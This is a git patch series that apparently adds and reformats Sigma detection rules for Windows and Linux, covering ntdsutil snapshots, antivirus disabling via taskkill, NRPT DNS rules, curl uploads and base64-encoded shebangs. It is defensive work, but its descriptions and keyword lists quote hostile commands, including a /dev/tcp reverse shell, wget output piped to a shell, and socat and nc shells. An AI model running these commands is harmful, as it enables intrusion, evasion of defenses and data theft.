a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml @@ -4,22 +4,21 @@ status: test description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups. author: 'Furkan Caliskan (@caliskanfurkan_)' references: - - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - - https://github.com/yosqueoy/ditsnap + - https://thedfirreport.com/2020/06/21/snatch-ransomware/ + - https://github.com/yosqueoy/ditsnap date: 2020/07/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ditsnap.exe' - selection2: - CommandLine|contains: 'ditsnap.exe' - condition: selection or selection2 + selection: + - Image|endswith: '\ditsnap.exe' + - CommandLine|contains: 'ditsnap.exe' + condition: selection falsepositives: - - Legitimate admin usage + - Legitimate admin usage level: high tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml new file mode 100644 index 000000000..cff53a918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml @@ -0,0 +1,38 @@ +title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +id: a58353df-af43-4753-bad0-cd83ef35eef5 +related: + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived +status: experimental +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +author: Nasreddine Bencherchali +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +date: 2022/09/14 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: '\ntdsutil.exe' + - OriginalFileName: 'ntdsutil.exe' + selection_cli: + - CommandLine|contains|all: + - 'snapshot' + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - 'ac' + - ' i' + - ' ntds' + condition: all of selection_* +falsepositives: + - Legitimate usage to restore snapshots + - Legitimate admin activity +level: medium +tags: + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml new file mode 100644 index 000000000..0afe7b43e --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml @@ -0,0 +1,26 @@ +title: Weak or Abused Passwords In CLI +id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 +status: experimental +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +author: Nasreddine Bencherchali +date: 2022/09/14 +tags: + - attack.defense_evasion + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + # Add more passwords + - 'Asd123.aaaa' + - 'password123' + - '123456789' + condition: selection +falsepositives: + - Legitimate usage of the passwords by users via commandline (should be discouraged) + - Other currently unknown false positives +level: medium From 02cfd972edf108f8527c50e8b9eabee51250e624 Mon Sep 17 00:00:00 2001 From: krestinichev <100998565+krestinichev@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:37:51 +0300 Subject: [PATCH 23/96] Add files via upload --- .../proc_creation_disable_SEP.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_disable_SEP.yml diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml new file mode 100644 index 000000000..102423988 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml @@ -0,0 +1,25 @@ +title: Disabling SEP +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - internal investigation +author: Ilya Krestinichev +date: 2022/09/13 +tags: + - attack.Impair_Defenses + - attack.t1562 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentCommandLine|contains|all: + - 'taskkill' + - 'ccSvcHst.exe' + condition: selection +fields: + - CommandLine +falsepositives: + - Unknown +level: critical \ No newline at end of file From eb4247fdb45bfd2a90e2768e23a9f8473d81242b Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:03:50 +0200 Subject: [PATCH 24/96] Add missing modified field --- .../proc_creation_win_cmd_redirection_susp_folder.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index dada69bd7..14fc79e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ date: 2022/07/12 +modified: 2022/09/14 logsource: category: process_creation product: windows From d078d47360c00849778d834ce0f491c836632be5 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 22:32:35 +0430 Subject: [PATCH 25/96] New Rule: Windows DNS Client Rule --- .../posh_ps_add_dnsclient_rule.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml new file mode 100644 index 000000000..637bf65e2 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -0,0 +1,23 @@ +title: Windows DNS Client Commands +id: 4368354e-1797-463c-bc39-a309effbe8d7 +status: experimental +description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. +references: + - https://twitter.com/NathanMcNulty/status/1569497348841287681 + - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps +author: Borna Talebi +date: 2021/09/14 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + selection: + ScriptBlockText|contains: Add-DnsClientNrptRule + condition: selection +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown +level: high From 227c2f6bb91f872cc25f33b25f5f14f4d353ce36 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:11:52 +0430 Subject: [PATCH 26/96] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 637bf65e2..5d589174b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -13,7 +13,10 @@ logsource: definition: Script Block Logging must be enabled detection: selection: - ScriptBlockText|contains: Add-DnsClientNrptRule + ScriptBlockText|contains|all: + - Add-DnsClientNrptRule + - Namespace + - NameServers condition: selection tags: - attack.impact From 0e7085bee5388b7b27319c80f152fc51ac404379 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:23:58 +0430 Subject: [PATCH 27/96] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 5d589174b..def0de1c4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -15,8 +15,8 @@ detection: selection: ScriptBlockText|contains|all: - Add-DnsClientNrptRule - - Namespace - - NameServers + - '-Namespace ' + - '-NameServers ' condition: selection tags: - attack.impact From b984d52c65189443a40afcead88097c4e41c1438 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:32:47 +0430 Subject: [PATCH 28/96] Fixing conditions --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index def0de1c4..1c8d0ab78 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -14,9 +14,9 @@ logsource: detection: selection: ScriptBlockText|contains|all: - - Add-DnsClientNrptRule - - '-Namespace ' - - '-NameServers ' + - 'Add-DnsClientNrptRule' + - '-Namesp' + - '-NameSe' condition: selection tags: - attack.impact From 2af0431efafb04f19e8c9fb1bbeb1128b5c9a81d Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:53:55 +0430 Subject: [PATCH 29/96] Change Title --- .../powershell/powershell_script/posh_ps_add_dnsclient_rule.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 1c8d0ab78..6acd74a7f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -1,4 +1,4 @@ -title: Windows DNS Client Commands +title: Powershell Add Name Resolution Policy Table Rule id: 4368354e-1797-463c-bc39-a309effbe8d7 status: experimental description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. From 92b6ba95e62d2d5514b39be94cdd60e9ef0861fd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:12:08 +0200 Subject: [PATCH 30/96] reduce the timeframe to 1min --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index ab736de4d..fd5cdf40b 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,7 +16,7 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - timeframe: 10m + timeframe: 1m condition: selection | count() > 10 fields: - ShareName From 6d9d08e1dec7bb6e86cdcfde55fbb23822881616 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:18:27 +0200 Subject: [PATCH 31/96] Update proc_creation_disable_SEP.yml --- .../proc_creation_disable_SEP.yml | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 102423988..773527fc0 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml @@ -1,25 +1,27 @@ -title: Disabling SEP +title: Disabling Symantec Endpoint Protection with Taskkill id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental -description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - - internal investigation -author: Ilya Krestinichev + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth date: 2022/09/13 tags: - - attack.Impair_Defenses - - attack.t1562 + - attack.defense_evasion + - attack.t1562.001 logsource: category: process_creation product: windows detection: selection: - ParentCommandLine|contains|all: + CommandLine|contains|all: - 'taskkill' + - ' /F ' + - ' /IM ' - 'ccSvcHst.exe' condition: selection -fields: - - CommandLine falsepositives: - Unknown -level: critical \ No newline at end of file +level: high From b4376ea580c7bdf74ac864b21a97b7e49d6a9162 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:22:21 +0200 Subject: [PATCH 32/96] refactor: CRLF to LF --- .../proc_creation_disable_SEP.yml | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 773527fc0..abe183491 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml @@ -1,27 +1,27 @@ -title: Disabling Symantec Endpoint Protection with Taskkill -id: 4a6713f6-3331-11ed-a261-0242ac120002 -status: experimental -description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. -references: - - https://www.exploit-db.com/exploits/37525 - - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection - - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer -author: Ilya Krestinichev, Florian Roth -date: 2022/09/13 -tags: - - attack.defense_evasion - - attack.t1562.001 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - 'taskkill' - - ' /F ' - - ' /IM ' - - 'ccSvcHst.exe' - condition: selection -falsepositives: - - Unknown -level: high +title: Disabling Symantec Endpoint Protection with Taskkill +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth +date: 2022/09/13 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'taskkill' + - ' /F ' + - ' /IM ' + - 'ccSvcHst.exe' + condition: selection +falsepositives: + - Unknown +level: high From 4fc62dee7c37bf97bb20db6b03e4109e85d1591d Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:22:57 +0200 Subject: [PATCH 33/96] Linux rules update --- .../auditd/lnx_auditd_data_exfil_wget.yml | 28 +++---- .../lnx_auditd_susp_histfile_operations.yml | 44 +++++----- .../linux/builtin/lnx_shell_susp_commands.yml | 84 +++++++++---------- ..._connection_lnx_back_connect_shell_dev.yml | 23 +++-- .../proc_creation_lnx_at_command.yml | 4 +- .../proc_creation_lnx_base64_decode.yml | 20 ++--- .../proc_creation_lnx_base64_shebang_cli.yml | 27 ++++++ ...ation_lnx_bpftrace_unsafe_option_usage.yml | 22 ++--- .../proc_creation_lnx_cat_sudoers.yml | 27 +++--- .../proc_creation_lnx_clear_logs.yml | 3 +- .../proc_creation_lnx_clear_syslog.yml | 6 +- ...proc_creation_lnx_clipboard_collection.yml | 16 ++-- .../proc_creation_lnx_crontab_removal.yml | 21 +++++ .../proc_creation_lnx_crypto_mining.yml | 54 ++++++------ .../proc_creation_lnx_curl_usage.yml | 22 +++++ .../proc_creation_lnx_doas_execution.yml | 2 +- .../proc_creation_lnx_file_deletion.yml | 4 +- .../proc_creation_lnx_local_account.yml | 8 +- .../proc_creation_lnx_local_groups.yml | 7 +- .../proc_creation_lnx_nohup.yml | 18 ++-- .../proc_creation_lnx_python_pty_spawn.yml | 2 +- ...eation_lnx_security_software_discovery.yml | 9 +- ..._creation_lnx_security_tools_disabling.yml | 48 +++++------ ...creation_lnx_services_stop_and_disable.yml | 26 ++++++ ...proc_creation_lnx_susp_curl_fileupload.yml | 38 +++++++++ .../proc_creation_lnx_susp_curl_useragent.yml | 28 +++++++ .../proc_creation_lnx_susp_history_delete.yml | 35 ++++---- .../proc_creation_lnx_susp_history_recon.yml | 36 ++++---- ...roc_creation_lnx_susp_interactive_bash.yml | 31 ++++--- .../proc_creation_lnx_susp_pipe_shell.yml | 23 +++-- ..._creation_lnx_system_network_discovery.yml | 11 ++- ...lnx_triple_cross_rootkit_execve_hijack.yml | 21 +++-- ...ation_lnx_triple_cross_rootkit_install.yml | 30 +++---- ..._creation_lnx_chattr_immutable_removal.yml | 25 ++++++ 34 files changed, 507 insertions(+), 296 deletions(-) create mode 100644 rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_curl_usage.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml create mode 100644 rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml diff --git a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 70a8dec73..c49ea64da 100644 --- a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -5,21 +5,21 @@ author: 'Pawel Mazur' status: experimental date: 2021/11/18 references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection tags: - - attack.exfiltration - - attack.t1048.003 + - attack.exfiltration + - attack.t1048.003 falsepositives: - - Legitimate usage of wget utility to post a file -level: medium \ No newline at end of file + - Legitimate usage of wget utility to post a file +level: medium diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 2515f99b4..7e50f7619 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -4,33 +4,33 @@ status: test description: 'Detects commandline operations on shell history files' author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2020/10/17 modified: 2021/11/27 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium tags: - - attack.credential_access - - attack.t1552.003 + - attack.credential_access + - attack.t1552.003 diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 44a5331c4..e31d748e5 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml @@ -4,56 +4,56 @@ status: test description: Detects suspicious shell commands used in various exploit codes (see references) author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ date: 2017/08/21 modified: 2021/11/27 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index 611227011..6b542f330 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml @@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: experimental description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md date: 2021/10/16 author: Florian Roth logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical - diff --git a/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 18c74f982..f3fd95576 100644 --- a/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -13,8 +13,8 @@ logsource: detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index acbfecabe..21ed3909f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml @@ -4,20 +4,20 @@ status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md date: 2020/10/19 modified: 2021/11/27 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low tags: - - attack.defense_evasion - - attack.t1027 + - attack.defense_evasion + - attack.t1027 diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..73ac17665 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: experimental +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +logsource: + product: linux + category: process_creation +detection: + selection: + - CommandLine|contains: + - "IyEvYmluL2Jhc2" #!/bin/bash" + - "IyEvYmluL2Rhc2" #!/bin/dash" + - "IyEvYmluL3pza" #!/bin/zsh" + - "IyEvYmluL2Zpc2" #!/bin/fish + - "IyEvYmluL3No" # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1140 diff --git a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml 